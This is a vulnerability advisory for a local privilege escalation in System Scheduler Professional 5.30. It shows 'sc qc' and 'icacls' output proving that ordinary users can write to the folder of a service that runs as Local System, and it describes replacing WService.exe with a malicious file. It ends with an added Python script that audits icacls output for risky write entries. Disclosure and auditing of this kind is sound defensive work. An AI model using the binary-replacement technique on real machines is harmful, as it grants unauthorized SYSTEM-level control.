Splinterware System Scheduler Professional 5.30 Privilege Escalation

2021.05.25
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

# Exploit Title: Splinterware System Scheduler Professional 5.30 - Privilege Escalation
# Date: 2021-05-11
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.splinterware.com
# Software Link: https://www.splinterware.com/download/ssproeval.exe
# Version: 5.30 Professional
# Tested on: Windows 10 Pro 20H2 x64

System Scheduler Professional 5.30 is subject to privilege escalation due to insecure file permissions, affecting the location from which the service 'WindowsScheduler' calls its executable. Because the service runs as Local System, a non-privileged user could execute arbitrary code with elevated privileges (system-level privileges as "nt authority\system"): if the WService.exe file located in the software's path is renamed and replaced with a malicious file, the new file will be executed after a short while.

C:\Users\test>sc qc WindowsScheduler
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: WindowsScheduler
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 0   IGNORE
        NOME_PERCORSO_BINARIO     : C:\PROGRA~2\SYSTEM~1\WService.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : System Scheduler Service
        DIPENDENZE                :
        SERVICE_START_NAME        : LocalSystem

C:\Users\test>icacls C:\PROGRA~2\SYSTEM~1\
C:\PROGRA~2\SYSTEM~1\ BUILTIN\Users:(RX,W)
                      BUILTIN\Users:(OI)(CI)(IO)(GR,GW,GE)
                      NT SERVICE\TrustedInstaller:(I)(F)
                      NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
                      NT AUTHORITY\SYSTEM:(I)(F)
                      NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                      BUILTIN\Administrators:(I)(F)
                      BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                      BUILTIN\Users:(I)(RX)
                      BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                      CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                      AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
                      AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE)
                      AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)
                      AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE)

Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file

C:\Users\test>
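
An added example (not part of the original advisory or the vendor's code): a small audit parser for icacls output like the listing above. It reports which allow entries give a principal outside an assumed trusted set write access, and whether each entry applies to the folder itself or only to its children. The `TRUSTED` set, the function name `risky_aces` and the trimmed `SAMPLE` are assumptions made for this example.

```python
import re

# Principals expected to hold write access (assumption: English account names;
# on localized systems compare SIDs instead).
TRUSTED = {"NT SERVICE\\TrustedInstaller", "NT AUTHORITY\\SYSTEM",
           "BUILTIN\\Administrators", "CREATOR OWNER"}
INHERIT = {"I", "OI", "CI", "IO", "NP"}          # icacls inheritance markers
WRITE = {"F", "M", "W", "GA", "GW", "WD", "AD", "DC", "D", "WDAC", "WO"}
ACE = re.compile(r"^(?P<who>.+?):(?P<groups>(?:\([A-Z,]+\))+)$")

def risky_aces(icacls_output, path):
    """Return (principal, scope, write_rights) for each allow ACE that lets a
    non-trusted principal modify `path` or the objects inside it."""
    findings = []
    for line in icacls_output.splitlines():
        line = line.strip()
        if line.startswith(path):                # first line is prefixed by the path
            line = line[len(path):].strip()
        m = ACE.match(line)
        if not m:                                # blank or localized summary line
            continue
        tokens = {t for g in re.findall(r"\(([A-Z,]+)\)", m["groups"])
                  for t in g.split(",")}
        write = sorted((tokens - INHERIT) & WRITE)
        if "DENY" in tokens or m["who"] in TRUSTED or not write:
            continue
        if "IO" in tokens:                       # inherit-only: not the folder itself
            scope = "children only"
        elif tokens & {"OI", "CI"}:
            scope = "folder and children"
        else:
            scope = "folder only"
        findings.append((m["who"], scope, write))
    return findings

# Constructed sample: a subset of the ACEs from the icacls output in the advisory.
SAMPLE = r"""
C:\PROGRA~2\SYSTEM~1\ BUILTIN\Users:(RX,W)
                      BUILTIN\Users:(OI)(CI)(IO)(GR,GW,GE)
                      NT AUTHORITY\SYSTEM:(I)(F)
                      BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                      BUILTIN\Users:(I)(RX)
                      CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file
"""

if __name__ == "__main__":
    for who, scope, rights in risky_aces(SAMPLE, "C:\\PROGRA~2\\SYSTEM~1\\"):
        print(f"{who}: {','.join(rights)} ({scope})")
```

On the advisory's listing, the two explicit (non-inherited) `BUILTIN\Users` entries are the ones reported; the inherited `(I)(RX)` entries are not.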

